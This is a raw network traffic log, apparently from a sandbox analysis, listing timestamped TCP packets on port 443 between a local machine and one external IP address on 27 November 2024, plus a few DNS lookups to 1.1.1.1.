                                                                                      Nov 27, 2024 20:47:41.148861885 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:41.195337057 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:41.195512056 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:41.243339062 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:41.429533958 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:41.429714918 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:41.429724932 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:41.429768085 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:41.429862022 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:41.429894924 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:41.475342035 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:41.475516081 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:41.519337893 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:41.646194935 CET44349798149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:41.646290064 CET49798443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:41.646306992 CET44349798149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:41.646323919 CET44349798149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:41.646349907 CET49798443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:41.646377087 CET49798443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:41.646641970 CET49798443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:41.646657944 CET44349798149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:41.676398993 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:41.676562071 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:41.676645041 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:41.676770926 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:41.723340988 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:41.723517895 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:41.767334938 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:41.767435074 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:41.804399967 CET49802443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:41.804439068 CET44349802149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:41.804532051 CET49802443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:41.804795027 CET49802443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:41.804810047 CET44349802149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:41.811337948 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:41.917614937 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:41.917745113 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:41.917782068 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:41.917804956 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:41.917918921 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:41.917953968 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:41.918036938 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:41.918056965 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:41.918154955 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:41.959341049 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:42.159560919 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:42.159693956 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.159773111 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:42.159812927 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:42.159867048 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.159888029 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.160106897 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.160201073 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.207353115 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:42.207478046 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.210200071 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.255335093 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:42.389071941 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:42.389214039 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:42.389224052 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.389251947 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:42.389337063 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.389353037 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.389400959 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:42.389456987 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.389467001 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:42.389528036 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.389631987 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.389693975 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.389760971 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.431335926 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:42.431437016 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.475333929 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:42.612663031 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:42.612826109 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.612859964 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:42.612899065 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:42.612941027 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.613009930 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.655339956 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:42.655448914 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.703335047 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:42.832814932 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:42.833018064 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.833038092 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:42.833086967 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:42.833148003 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.833172083 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.833177090 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:42.833192110 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:42.833261013 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.833276987 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:42.833287001 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.833363056 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:42.875335932 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:43.134859085 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:43.134996891 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:43.135026932 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:43.303041935 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:48.469280005 CET44349802149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:48.469369888 CET49802443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:48.469969034 CET49802443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:48.469978094 CET44349802149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:48.470230103 CET49802443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:48.470235109 CET44349802149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:48.470426083 CET49802443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:48.470432043 CET44349802149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:50.548193932 CET44349802149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:50.548278093 CET49802443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:50.548293114 CET44349802149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:50.548310995 CET44349802149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:50.548335075 CET49802443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:50.548353910 CET49802443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:50.548573017 CET49802443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:50.548588037 CET44349802149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:50.695691109 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:50.695775032 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:50.695805073 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:50.695827007 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:50.695853949 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:50.695894957 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:50.696160078 CET49799443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:50.696175098 CET44349799149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:50.766093969 CET49803443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:50.766149998 CET44349803149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:50.766261101 CET49803443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:50.766494989 CET49803443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:50.766509056 CET44349803149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:52.181133986 CET44349803149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:52.181339979 CET49803443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:52.181898117 CET49803443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:52.181911945 CET44349803149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:52.182161093 CET49803443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:52.182168007 CET44349803149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:52.182286024 CET49803443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:52.182293892 CET44349803149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:52.799540043 CET44349803149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:52.799633980 CET44349803149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:47:52.799766064 CET49803443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:47:52.799766064 CET49803443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.603504896 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.603544950 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.603559017 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.603589058 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.603610039 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.603641033 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.603652954 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.603667974 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.603671074 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.603773117 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.603785992 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.603873968 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.603887081 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.603898048 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.603903055 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.603924990 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.603935003 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.604021072 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.604036093 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.604051113 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.604058981 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.604077101 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.604089022 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.604159117 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.604171991 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.604190111 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.604203939 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.604232073 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.604240894 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.604351044 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.604360104 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.604389906 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.604402065 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.604464054 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.604473114 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.604549885 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.604563951 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.604583025 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.604595900 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.604692936 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.604700089 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.604731083 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.604741096 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.604837894 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.604850054 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.604861975 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.604959011 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.604969978 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.605010986 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.605021954 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.605060101 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.605072975 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.605106115 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.605118036 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.605156898 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.605170012 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.605201960 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.605211973 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.605268955 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.605323076 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.605333090 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.605401993 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.605417013 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.605474949 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.605535984 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.651330948 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.651662111 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.651814938 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.651910067 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.652000904 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.652076960 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.699343920 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.699872971 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.700182915 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.700239897 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.700278997 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.700326920 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.700371981 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.747325897 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.747714043 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.747795105 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.747838974 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.747879982 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.748049974 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.748111963 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.767169952 CET44349805149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.767353058 CET44349805149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.767354965 CET49805443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.767402887 CET44349805149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.767476082 CET49805443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.767515898 CET49805443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.791369915 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.791821957 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.791874886 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.791929960 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.791979074 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.792032003 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.815335035 CET44349805149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.839328051 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.839840889 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.839878082 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.840086937 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.840161085 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.840210915 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.840255022 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.887346983 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.887825966 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.887871981 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.887923002 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.887976885 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.888062000 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.931355000 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.931809902 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.931948900 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.931994915 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.932051897 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.932082891 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.979336977 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:00.979641914 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.979698896 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.979722023 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.979764938 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.979789019 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.979948044 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:00.980014086 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.023344994 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:01.023647070 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.023716927 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.023768902 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.023829937 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.023885965 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.067333937 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:01.067687988 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.067720890 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.067926884 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.067994118 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.068048954 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.068099976 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.111357927 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:01.111721992 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.111829042 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.111900091 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.111959934 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.112010956 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.155339003 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:01.155766964 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.155843019 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.155893087 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.155940056 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.155996084 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.203336000 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:01.203671932 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.203738928 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.251343012 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:01.367017031 CET44349805149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:01.367193937 CET44349805149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:01.367233038 CET49805443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.367286921 CET49805443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.367357969 CET49805443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.367372036 CET49805443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.411340952 CET44349805149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:01.617839098 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:01.618089914 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:01.618273020 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.618319988 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.663335085 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:01.663619995 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.663693905 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.663743019 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.663805962 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.663832903 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.664060116 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.664103031 CET49806443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.707343102 CET44349806149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:01.858645916 CET44349805149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:01.858833075 CET44349805149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:01.858869076 CET49805443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.858942032 CET44349805149.154.167.220192.168.2.5
                                                                                      Nov 27, 2024 20:48:01.858989000 CET49805443192.168.2.5149.154.167.220
                                                                                      Nov 27, 2024 20:48:01.859034061 CET49805443192.168.2.5149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 27, 2024 20:46:29.785741091 CET | 56874 | 53 | 192.168.2.5 | 1.1.1.1
Nov 27, 2024 20:46:30.347095013 CET | 53 | 56874 | 1.1.1.1 | 192.168.2.5
Nov 27, 2024 20:46:37.921238899 CET | 64946 | 53 | 192.168.2.5 | 1.1.1.1
Nov 27, 2024 20:46:38.072345972 CET | 53 | 64946 | 1.1.1.1 | 192.168.2.5
